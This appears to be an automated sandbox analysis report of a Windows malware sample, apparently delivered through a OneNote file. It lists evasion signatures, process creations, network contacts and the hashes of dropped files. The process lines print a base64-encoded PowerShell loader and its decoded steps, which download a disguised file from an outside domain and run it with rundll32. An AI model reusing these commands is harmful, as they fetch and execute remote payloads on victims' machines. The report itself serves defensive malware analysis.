Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl25lcnvsz3lta2hhbmeuy29tl0ndb04vmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl25lcnvsz3lta2hhbmeuy29tl0ndb04vmdeuz2lmic1pdxrgawxliem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzw0kcnvuzgxsmzigqzpcchjvz3jhbwrhdgfcchv0dhkuanbnlfdpbmqncmv4axqncg=='))			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Domain

Country

Flag

ASN

ASN Name

Malicious

109.203.123.62

nerulgymkhana.com

United Kingdom

31727

NODE4-ASGB

false

Name

Active

nerulgymkhana.com

109.203.123.62

true

Name

Malicious

Antivirus Detection

Reputation

https://nerulgymkhana.com/CCoN/01.gif

false

2%, Virustotal, Browse
Avira URL Cloud: safe

unknown

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\in.cmd	ASCII text, with CRLF line terminators	01334CD9D21D65FBA8AD4ECABD9A3CB1	09372B85212386FE46AE5C72DDFDF94A16CBEBCD	CCDE06F3D61E0D17B1FB72CD6882A3E592BF88992287B9227EF50AF7F570B09C
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D95B36A3-A6E1-458A-A353-27D51DD43A0C	XML 1.0 document, ASCII text, with CRLF line terminators	476810F58834EEAB66B3DCD3C374A4DF	818A97076DAA80882E81C4F79F6F37AA5BE5A4BA	F520A9AA617486C6C38D1251B98509172B1851C9EB959DFBB3AC01B6825CFEF9
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header	Matlab v4 mat-file (little endian) , numeric, rows 262223750, columns 0	607BCCCF2EC708053F9E047D8B0669CA	06F44AA90BD3397E477B88DCC57FBD93FB87A47E	5F6D715BE15A4B7D1A5273E545C1C1BCCF865BE2E581661331DE2E312A5680B0
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced	BC6C08F8C2C6D1EEE95ABFC40C3C3669	44DE7375375880ACC24938D7E92A837E85C35321	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3E9F7D399DF9CAD3669B7A5445EF7074	2FBC965DC03EF9203581F595E0D7AB1734726ED7	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	5B386BF9A20766956A84F67F913F23D7	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced	B1FDE66F75507567B5F0C6C07B01A3A1	80B8E6A923E853232F66C874367E90B5C9CAD7AE	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	875CFB3B5C3619253223731E8C9879E5	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced	6EFE6733E10E011FFDD6711B5F37C9E2	C72549E824EAD899944A38C46FBC28BDCDAAD611	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3A5CD52E925A7C4A345047D8F06C3C41	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	01367FEEE0A83E8765E971E0D3740900	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced	8B3AEC1986A522951942BA72B85CCAA0	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced	29B87BEEC5D3899824AA390530CD47FB	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced	548D234C9AB4021CA5FAB7BF22502465	2F7495D250DC86EA99473CC342D164B859926021	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	708E8EB906BC105CCA0535AE669AA651	38D82DEDFE97D3001188C2E18FE13BD741FD520F	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced	830632032C7DDBCCDE126F4BAE935540	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced	91CB7F1273AA003076401081B8A22237	5157144069E7D2FDAE60B397BE5851E75BDF7707	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	31579CA3352DF8FA4E3E7F48C7CDF672	AA682A3C781BF8EE43B5EDC9718E64CB79135F25	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced	817D5A35EDB2B0E052194D4F49FDA19C	FA6CB2016C5F43B76102B63D60359139227E07EA	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced	E88131C9AAC52649FF044905ACAB9B76	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced	EF9AA5B2ADBE5DF68AC4F4D716DF7708	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced	7F161B19B937AB48D4FD2F6E5E16FDBD	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	163E6791C87E4999C343EC5E23843B15	43CE3BAE19E22876483A7FD0E93DB45790373600	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced	BC6C08F8C2C6D1EEE95ABFC40C3C3669	44DE7375375880ACC24938D7E92A837E85C35321	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3E9F7D399DF9CAD3669B7A5445EF7074	2FBC965DC03EF9203581F595E0D7AB1734726ED7	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	5B386BF9A20766956A84F67F913F23D7	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced	B1FDE66F75507567B5F0C6C07B01A3A1	80B8E6A923E853232F66C874367E90B5C9CAD7AE	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	875CFB3B5C3619253223731E8C9879E5	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced	6EFE6733E10E011FFDD6711B5F37C9E2	C72549E824EAD899944A38C46FBC28BDCDAAD611	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3A5CD52E925A7C4A345047D8F06C3C41	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	01367FEEE0A83E8765E971E0D3740900	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced	8B3AEC1986A522951942BA72B85CCAA0	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
